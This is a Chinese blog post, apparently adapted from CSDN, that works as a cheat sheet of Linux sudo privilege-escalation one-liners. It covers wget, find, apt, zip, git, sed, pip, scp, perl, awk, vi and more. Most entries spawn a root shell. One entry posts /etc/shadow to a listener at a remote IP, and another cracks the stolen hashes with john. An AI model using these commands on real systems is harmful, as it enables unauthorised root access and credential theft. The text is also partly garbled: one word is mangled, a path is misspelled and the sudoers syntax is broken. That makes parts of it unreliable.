Linux常见提权方式

大家好，欢迎来到IT知识分享网。

文章主要内容来自于：Linux提权——SUDO_sudo提权-CSDN博客

这里对部分内容进行了扩充，后续可能会再进一步完善

使用Sudo权限提升Linux账户权限

Sudoer文件语法

假如我们（root用户）要给普通用户test分配sudo权限，请输出vim /etc/sudoers打开文件进行编辑，找到root权限root ALL=(ALL:ALL) ALL，在下一行输入
test ALL(ALL:ALL) ALL，保存后退出，这样即表示用户test可以使用sudo调用root权限执行命令。

给普通用户设置 sudo权限

打开 /etc/sudoers 文件

vim /etc/sudoers 

给普通用户test 的wget命令添加sudo权限供下面进行提权测试

test ALL(ALL:ALL) /usr/bin/wget 

或者直接给于用户root权限，下面测试时不必来回修改

test ALL(ALL:ALL) ALL 

提权命令总览

可以利用sudo提权的命令如下

wget、find、cat、apt、zip、xxd、time、taskset、git、sed、pip、ed、tmux、scp、perl、bash、less、awk、man、vi、env、ftp

sudo wget提权

kali上监听 nc -lvp 4444 > hash.txt 靶机上 /usr/bin/wget --post-file=/etc/shadow 192.168.0.114:4444 

使用john字典模式对其进行激活成功教程

/usr/share/john$ john --wordlist=password.lst /home/light/hash.txt 

sudo find提权

 SUID提权的思路就是运行root用户所拥有的SUID的文件，当其他用户运行该文件的时候就得获得root用户的身份。

使用find命令查看拥有suid权限的文件

1. find / -user root -perm -4000-exec ls -ldb {} \;
2. find / -perm -u=s -type f 2>/dev/null
3. find / -user root -perm -4000-print2>/del/null

find 命令用来在指定目录下查​​​​​​​

找文件，这里使用“exec”来执行/bin/bash，以访问root shell

sudo find /home -exec /bin/bash \; 

sudo cat 提权

sudo cat /etc/shadow 

sudo apt 提权

TF=$(mktemp) echo 'Dpkg::Pre-Invoke {"/bin/sh;false"}' > $TF sudo apt-get install -c $TF sl 

sudo zip提权

sudo zip hash.zip hash.txt -T --unzip-command="sh -c /bin/bash" 

sudo xxd提权

sudo xxd "/etc/shadow" | xxd -r 

同样是保存后，使用jhon激活成功教程哈希密码。

sudo time 提权

sudo taskset提权

sudo taskset 1 /bin/sh -p 

sudo git提权

第一种方法 sudo git help config 输入!/bin/sh 并回车执行shell 

第二种方法 sudo git -p help !/bin/bash 

sudo sed提权

sudo sed -n '1e exec sh 1>&0' /etc/passwd 

sudo pip提权

TF=$(mktemp -d) echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py sudo pip install $TF 

sudo ed提权

sudo ed !/bin/sh 

sudo tmux提权

sudo tmux 

sudo scp提权 

TF=$(mktemp) echo 'sh 0<&2 1>&2' > $TF chmod +x "$TF" sudo scp -S $TF x y: 

sudo perl提权

sudo perl -e 'exec "/bin/bash";' 

sudo bash提权

bash -p 

sudo less提权

sudo less /etc/hosts !bash 

sudo awk提权

sudo awk 'BEGIN {system("/bin/bash")}' 

sudo man提权

sudo man man !bash 

sudo vi/vim提权

sudo vi :!bash 

sudo env 提权

sudo env /bin/bash 

sudo ftp提权

sudo ftp ! /bin/bash